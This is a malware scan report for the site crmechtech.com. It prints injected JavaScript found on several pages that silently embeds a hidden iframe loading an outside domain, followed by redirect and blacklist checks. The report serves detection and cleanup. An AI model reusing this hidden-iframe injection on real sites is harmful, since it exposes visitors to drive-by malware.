Scanned pages/files
Request | Server response | Status |
http://crmechtech.com/ | 200 OK Content-Length: 39379 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefox\/\w+\.\w+/i, divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://crmechtech.com/media/system/js/mootools-core.js | 200 OK Content-Length: 95132 Content-Type: application/javascript | clean |
http://crmechtech.com/media/system/js/core.js | 200 OK Content-Length: 4775 Content-Type: application/javascript | clean |
http://crmechtech.com/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://crmechtech.com/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://crmechtech.com/plugins/system/helix/js/menu.js | 200 OK Content-Length: 4137 Content-Type: application/javascript | clean |
http://crmechtech.com/plugins/system/helix/js/totop.js | 200 OK Content-Length: 998 Content-Type: application/javascript | clean |
http://crmechtech.com/modules/mod_sp_simple_gallery/scripts/slimbox.js | 200 OK Content-Length: 4627 Content-Type: application/javascript | clean |
http://crmechtech.com/modules/mod_freeslider_sp1/assets/js/script.js | 200 OK Content-Length: 6683 Content-Type: application/javascript | clean |
http://crmechtech.com/media/com_finder/js/autocompleter.js | 200 OK Content-Length: 16256 Content-Type: application/javascript | clean |
http://crmechtech.com/index.php/about-us | 200 OK Content-Length: 25568 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefox\/\w+\.\w+/i, divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://crmechtech.com/index.php/products | 200 OK Content-Length: 28691 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefox\/\w+\.\w+/i, divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://crmechtech.com/index.php/other-products | 200 OK Content-Length: 26609 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefox\/\w+\.\w+/i, divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://crmechtech.com/index.php/jobs | 200 OK Content-Length: 25222 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefox\/\w+\.\w+/i, divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://crmechtech.com/index.php/contacts-us | 200 OK Content-Length: 28492 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefox\/\w+\.\w+/i, divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: crmechtech.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 03 Apr 2015 00:42:01 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 47eedd0ae501f9ba5e6ace7698c00a28=rs45t47lj9savi405mvtu53j60; path=/
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: crmechtech.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 03 Apr 2015 00:42:01 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 47eedd0ae501f9ba5e6ace7698c00a28=rs45t47lj9savi405mvtu53j60; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: crmechtech.com
Referer: http://www.google.com/search?q=crmechtech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: crmechtech.com
Referer: http://www.google.com/search?q=crmechtech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=crmechtech.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://crmechtech.com/
Result: crmechtech.com is not infected or malware details are not published yet.
Result: crmechtech.com is not infected or malware details are not published yet.